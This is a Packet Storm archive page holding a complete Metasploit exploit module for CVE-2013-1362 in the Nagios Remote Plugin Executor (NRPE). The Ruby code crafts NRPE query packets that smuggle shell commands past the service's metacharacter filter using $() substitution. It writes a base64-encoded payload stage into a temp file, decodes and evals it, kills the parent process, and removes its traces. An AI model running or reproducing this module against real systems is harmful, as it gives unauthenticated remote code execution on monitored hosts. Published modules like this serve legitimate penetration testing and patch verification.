accept no compromises

Nagios Remote Plugin Executor Arbitrary Command Execution

Nagios Remote Plugin Executor Arbitrary Command Execution
Posted Apr 12, 2013
Authored by Rudolph Pereir | Site metasploit.com

The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.

tags | exploit, remote, arbitrary
advisories | CVE-2013-1362, OSVDB-90582
MD5 | f762528b7aa2218b0fa93e100963a2f3

Nagios Remote Plugin Executor Arbitrary Command Execution

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
#

require 'msf/core'
require 'zlib'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',
'Description' => %q{
The Nagios Remote Plugin Executor (NRPE) is installed to allow a central
Nagios server to actively poll information from the hosts it monitors. NRPE
has a configuration option dont_blame_nrpe which enables command-line arguments
to be provided remote plugins. When this option is enabled, even when NRPE makes
an effort to sanitize arguments to prevent command execution, it is possible to
execute arbitrary commands.
},
'Author' =>
[
'Rudolph Pereir', # Vulnerability discovery
'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module
],
'References' =>
[
[ 'CVE', '2013-1362' ],
[ 'OSVDB', '90582'],
[ 'BID', '58142'],
[ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']
],
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' =>
{
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'perl python ruby bash telnet',
# *_perl, *_python and *_ruby work if they are installed
}
},
'Targets' =>
[
[ 'Nagios Remote Plugin Executor prior to 2.14', {} ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 21 2013'
))

register_options(
[
Opt::RPORT(5666),
OptEnum.new('NRPECMD', [
true,
"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg",
'check_procs',
['check_procs', 'check_users', 'check_load', 'check_disk']
]),
# Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below
OptBool.new('NRPESSL', [ true, "Use NRPE's Anonymous-Diffie-Hellman-variant SSL ", true])
], self.class)
end

def send_message(message)
packet = [
2, # packet version
1, # packet type, 1 => query packet
0, # checksum, to be added later
0, # result code, discarded for query packet
message, # the command and arguments
0 # padding
]
packet[2] = Zlib::crc32(packet.pack("nnNna1024n")) # calculate the checksum
begin
self.sock.put(packet.pack("nnNna1024n")) #send the packet
res = self.sock.get_once # get the response
rescue ::EOFError => eof
res = ""
end

return res.unpack("nnNnA1024n")[4] unless res.nil?
end

def setup
@ssl_socket = nil
@force_ssl = false
super
end

def exploit

if check != Exploit::CheckCode::Vulnerable
fail_with(Exploit::Failure::NotFound, "Host does not support plugin command line arguments or is not accepting connections")
end

stage = "setsid nohup #{payload.encoded} & "
stage = Rex::Text.encode_base64(stage)
# NRPE will reject queries containing |`&><'\"\\[]{}; but not $() :)
command = datastore['NRPECMD']
command << "!"
command << "$($(rm -f /tmp/$$)" # Delete the file if it exists
# need a way to write to a file without using redirection (>)
# cant count on perl being on all linux hosts, use GNU Sed
# TODO: Probably a better way to do this, some hosts may not have a /tmp
command << "$(cp -f /etc/passwd /tmp/$$)" # populate the file with at least one line of text
command << "$(sed 1i#{stage} -i /tmp/$$)" # prepend our stage to the file
command << "$(sed q -i /tmp/$$)" # delete the rest of the lines after our stage
command << "$(eval $(base64 -d /tmp/$$) )" # decode and execute our stage, base64 is in coreutils right?
command << "$(kill -9 $$)" # kill check_procs parent (popen'd sh) so that it never executes
command << "$(rm -f /tmp/$$))" # clean the file with the stage
connect
print_status("Sending request...")
send_message(command)
disconnect
end

def check
print_status("Checking if remote NRPE supports command line arguments")

begin
# send query asking to run "fake_check" command with command substitution in arguments
connect
res = send_message("__fake_check!$()")
# if nrpe is configured to support arguments and is not patched to add $() to
# NASTY_META_CHARS then the service will return:
# NRPE: Command '__fake_check' not defined
if res =~ /not defined/
return Exploit::CheckCode::Vulnerable
end
# Otherwise the service will close the connection if it is configured to disable arguments
rescue EOFError => eof
return Exploit::CheckCode::Safe
rescue Errno::ECONNRESET => reset
unless datastore['NRPESSL'] or @force_ssl
print_status("Retrying with ADH SSL")
@force_ssl = true
retry
end
return Exploit::CheckCode::Safe
rescue => e
return Exploit::CheckCode::Unknown
end
# TODO: patched version appears to go here
return Exploit::CheckCode::Unknown

end

# NRPE uses unauthenticated Annonymous-Diffie-Hellman

# setting the global SSL => true will break as we would be overlaying
# an SSLSocket on another SSLSocket which hasnt completed its handshake
def connect(global = true, opts={})

self.sock = super(global, opts)

if datastore['NRPESSL'] or @force_ssl
ctx = OpenSSL::SSL::SSLContext.new("TLSv1")
ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
ctx.ciphers = "ADH"

@ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)

@ssl_socket.connect

self.sock.extend(Rex::Socket::SslTcp)
self.sock.sslsock = @ssl_socket
self.sock.sslctx = ctx
end

return self.sock
end

def disconnect
@ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl
super
end

end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    2 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close